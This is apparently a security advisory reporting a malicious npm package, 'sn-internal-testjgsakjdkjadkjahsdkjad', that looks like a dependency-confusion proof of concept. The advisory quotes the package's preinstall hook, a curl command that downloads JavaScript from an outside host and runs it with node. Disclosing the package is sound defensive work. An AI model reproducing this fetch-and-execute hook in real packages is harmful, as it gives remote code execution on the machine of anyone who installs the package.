—

MAL-2026-5646

Malicious code in sn-internal-testjgsakjdkjadkjahsdkjad (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b71b954927bd19d1ae8c3bef3965b4cbbaae3cc1f29c34ae6f90f36b2cd7f7fe) package.json declares a preinstall lifecycle hook that runs `curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js`. On any `npm install`, the script fetches an unpinned, mutable JavaScript file from poc.amanrawat.com over plain HTTPS and immediately executes it with node under the installer's user account. There is no hash or signature verification, no version pinning, and the destination is not a recognized runtime/CDN or publisher-owned host. The package name (`sn-internal-testjgsakjdkjadkjahsdkjad`), description ("This is our internal app for testing"), and the `poc.` (proof-of-concept) hostname indicate this is a dependency-confusion / supply-chain PoC, but the install-time payload is a real and unconditional remote-code-execution primitive against any installer.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / sn-internal-testjgsakjdkjadkjahsdkjad

No fixed version published yet for sn-internal-testjgsakjdkjadkjahsdkjad (npm). Pin to a known-safe version or switch to an alternative.

References

https://www.npmjs.com/package/sn-internal-testjgsakjdkjadkjahsdkjad/v/2.1.1 [PACKAGE]